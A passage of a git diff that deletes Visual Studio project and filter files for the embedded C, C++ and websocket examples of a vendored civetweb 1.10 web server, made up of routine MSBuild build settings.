-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>WIN32;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>WIN32;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h" />

-    <ClInclude Include="..\..\include\CivetServer.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\civetweb.c" />

-    <ClCompile Include="..\..\src\CivetServer.cpp" />

-    <ClCompile Include="..\..\examples\embedded_cpp\embedded_cpp.cpp" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_embed_cpp/ex_embed_cpp.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/ex_embed_cpp/ex_embed_cpp.vcxproj.filters
deleted file mode 100644
index 68671e6..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_embed_cpp/ex_embed_cpp.vcxproj.filters
+++ /dev/null
@@ -1,36 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\include\CivetServer.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\examples\embedded_cpp\embedded_cpp.cpp">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\civetweb.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\CivetServer.cpp">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-</Project>

diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_embedded_c/ex_embedded_c.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/ex_embedded_c/ex_embedded_c.vcxproj
deleted file mode 100644
index c3a429f..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_embedded_c/ex_embedded_c.vcxproj
+++ /dev/null
@@ -1,161 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\examples\embedded_c\embedded_c.c" />

-    <ClCompile Include="..\..\src\civetweb.c" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h" />

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{882EC43C-2EEE-434B-A711-C844108D29C6}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>ex_embedded_c</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140_xp</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140_xp</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_IPV6;USE_WEBSOCKET;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <AdditionalDependencies>winmm.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_IPV6;USE_WEBSOCKET;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_IPV6;USE_WEBSOCKET;WIN32;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_IPV6;USE_WEBSOCKET;WIN32;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_embedded_c/ex_embedded_c.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/ex_embedded_c/ex_embedded_c.vcxproj.filters
deleted file mode 100644
index cf2e4d0..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_embedded_c/ex_embedded_c.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\civetweb.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\examples\embedded_c\embedded_c.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket/ex_websocket.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/ex_websocket/ex_websocket.vcxproj
deleted file mode 100644
index 8076f89..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket/ex_websocket.vcxproj
+++ /dev/null
@@ -1,162 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{58B93E94-7766-435E-93AE-42A2FB5D99B1}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>ex_websocket</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;NDEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>USE_WEBSOCKET;WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\examples\websocket\WebSockCallbacks.h" />

-    <ClInclude Include="..\..\include\civetweb.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\examples\websocket\WebSockCallbacks.c" />

-    <ClCompile Include="..\..\src\civetweb.c" />

-    <ClCompile Include="..\..\examples\websocket\websocket.c" />

-  </ItemGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket/ex_websocket.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/ex_websocket/ex_websocket.vcxproj.filters
deleted file mode 100644
index 9adb8fb..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket/ex_websocket.vcxproj.filters
+++ /dev/null
@@ -1,36 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\examples\websocket\WebSockCallbacks.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\examples\websocket\websocket.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\civetweb.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\examples\websocket\WebSockCallbacks.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket_client/ex_websocket_client.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/ex_websocket_client/ex_websocket_client.vcxproj
deleted file mode 100644
index 013c887..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/ex_websocket_client/ex_websocket_client.vcxproj
+++ /dev/null
@@ -1,160 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

